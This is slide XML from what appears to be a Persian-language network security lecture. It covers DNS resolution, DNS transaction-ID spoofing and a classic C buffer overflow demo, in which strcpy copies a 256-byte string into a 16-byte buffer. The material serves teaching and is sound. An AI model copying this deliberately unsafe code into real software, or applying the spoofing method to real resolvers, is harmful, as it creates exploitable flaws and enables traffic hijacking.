          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5011738" y="3281363"/>
            <a:ext cx="311150" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5608638" y="4321175"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 31"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5040313" y="1517650"/>
            <a:ext cx="369887" cy="657225"/>
            <a:chOff x="4180" y="783"/>
            <a:chExt cx="150" cy="307"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2096" name="AutoShape 32"/>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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2097" name="Rectangle 33"/>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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2098" name="Rectangle 34"/>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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2099" name="AutoShape 35"/>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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2100" name="Line 36"/>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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2101" name="Line 37"/>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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2102" name="Rectangle 38"/>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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2103" name="Rectangle 39"/>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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 40"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5868988" y="2946400"/>
            <a:ext cx="369887" cy="657225"/>
            <a:chOff x="4180" y="783"/>
            <a:chExt cx="150" cy="307"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2088" name="AutoShape 41"/>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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2089" name="Rectangle 42"/>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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2090" name="Rectangle 43"/>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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2091" name="AutoShape 44"/>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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2092" name="Line 45"/>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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2093" name="Line 46"/>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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2094" name="Rectangle 47"/>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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2095" name="Rectangle 48"/>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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 49"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5849938" y="4565650"/>
            <a:ext cx="369887" cy="657225"/>
            <a:chOff x="4180" y="783"/>
            <a:chExt cx="150" cy="307"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2080" name="AutoShape 50"/>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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2081" name="Rectangle 51"/>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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2082" name="Rectangle 52"/>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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2083" name="AutoShape 53"/>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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2084" name="Line 54"/>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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2085" name="Line 55"/>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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2086" name="Rectangle 56"/>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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2087" name="Rectangle 57"/>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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2074" name="Text Box 58"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4932363" y="5137150"/>
            <a:ext cx="2617787" cy="581025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>authoritative DNS server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dns.cs.umass.edu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Text Box 59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4981575" y="4351338"/>
            <a:ext cx="311150" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Text Box 60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4238625" y="4498975"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Line 61"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4308475" y="3422650"/>
            <a:ext cx="1493838" cy="1314450"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Line 62"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4268788" y="3538538"/>
            <a:ext cx="1493837" cy="1301750"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2079" name="Text Box 63"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5240338" y="2560638"/>
            <a:ext cx="2366962" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>TLD DNS server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67"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79</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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9" grpId="0"/>
      <p:bldP spid="30" grpId="0"/>
      <p:bldP spid="31" grpId="0"/>
      <p:bldP spid="32" grpId="0"/>
      <p:bldP spid="33" grpId="0"/>
      <p:bldP spid="34" grpId="0"/>
      <p:bldP spid="63" grpId="0"/>
      <p:bldP spid="64" grpId="0"/>
      <p:bldP spid="65"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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" smtClean="0"/>
              <a:t>مثال دوم</a:t>
            </a:r>
            <a:endParaRPr smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16388" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="1371600"/>
            <a:ext cx="7010400" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Buffer overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> از چک نکردن محدوده توسط برنامه ها استفاده </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ميکند!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16389" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="2209800"/>
            <a:ext cx="5212115" cy="4093428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>void function(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>	char buffer[16];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>(buffer, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> main(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>	char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1" smtClean="0"/>
              <a:t>large_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>[256</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>	for (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> = 0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> &lt; 255; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>++){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1" smtClean="0"/>
              <a:t>large_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>] = ‘A’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>function(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1" smtClean="0"/>
              <a:t>large_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6"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8</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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143000" y="0"/>
            <a:ext cx="7543800" cy="1066800"/>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a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DNS request sends transaction Id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DNS will accepts any reply containing transaction ID and assuming remote IP and TCP/UDP ports match</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Transaction Ids are only 16-bits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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80</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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990600" y="0"/>
            <a:ext cx="7696200" cy="1143000"/>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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>DNS ID Spoofing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15364" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="1447800"/>
            <a:ext cx="7467600" cy="830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r" rtl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="65000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> نفوذ گر در خواست </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> کاربر را شنود نموده و يک بسته جعلي به عنوان جواب در خواست مطرح شده براي او ارسال مي کند </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="6356350"/>
            <a:ext cx="2133600" cy="365125"/>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defRPr/>
            </a:pPr>
            <a:fld id="{AF609A56-AC5A-4F35-9CD4-7517B1924DD8}" type="slidenum">
              <a:rPr kumimoji="0" lang="fa-IR" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>81</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="fa-IR" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="3000375"/>
            <a:ext cx="7920038" cy="1800225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 5" descr="6"/>
          <p:cNvPicPr preferRelativeResize="0">
            <a:picLocks noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
